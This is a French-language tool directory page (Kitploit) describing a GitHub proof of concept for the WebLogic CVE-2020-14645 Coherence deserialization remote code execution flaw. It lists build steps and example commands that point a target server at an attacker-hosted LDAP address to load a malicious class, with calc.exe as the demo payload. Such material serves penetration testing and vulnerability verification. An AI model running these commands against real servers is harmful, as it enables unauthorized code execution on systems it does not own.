Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/jlvsjp/weblogic_cve-2020-14645
Analyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité WebTests d'IntrusionOutil d'Accès à DistanceDéveloppement de Charges Utiles
GitHubjlvsjp/weblogic_cve-2020-14645

Weblogic_CVE-2020-14645

PoC Java pour la désérialisation RCE de WebLogic CVE-2020-14645 Coherence. Héberge une classe malveillante via LDAP et déclenche l'exécution de code à distance sur les serveurs WebLogic vulnérables.

Voir le dépôt
16il y a 6 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Programme de vérification de la vulnérabilité de désérialisation Weblogic CVE-2020-14645 coherence

Environnement

  • Maven 3

  • JDK 1.8

Compilation

root@kitploit:~
mvn package

Utilisation

Étapes de test spécifiques :

  1. Écrire le POC
  2. Compiler le POC en fichier class
  3. Démarrer un site statique pour publier le POC compilé
  4. Démarrer un proxy LDAP pour transférer les requêtes de récupération du POC par la cible de test
  5. Exécution du programme de test

Comme cette vulnérabilité est similaire à celle d'Apache Dubbo, veuillez vous référer à cette vulnérabilité pour réaliser les étapes 1-4.

Exécution du programme de test

root@kitploit:~
java -jar target/CVE-2020-14645.jar LDAP_IP:LDAP_PORT/#CLASS_NAME WEBLOGIC_URL

# Exemple
java -jar target/CVE-2020-14645.jar 1.1.1.1:8080/#exp http://127.0.0.1:7001
java -jar target/CVE-2020-14645.jar 1.1.1.1:8080/#exp https://127.0.0.1:7002

Si vous utilisez le POC fourni dans cet exemple, la cible testée exécutera calc.exe après une exploitation réussie. Veuillez modifier le POC vous-même en fonction de l'environnement de la cible de test.

Remerciements

Ce projet fait référence et cite une partie du code des projets @Y4er et @5up3rc, avec nos remerciements !

Références

https://github.com/Y4er/CVE-2020-14645

https://github.com/5up3rc/weblogic_cmd

Télécharger l’outil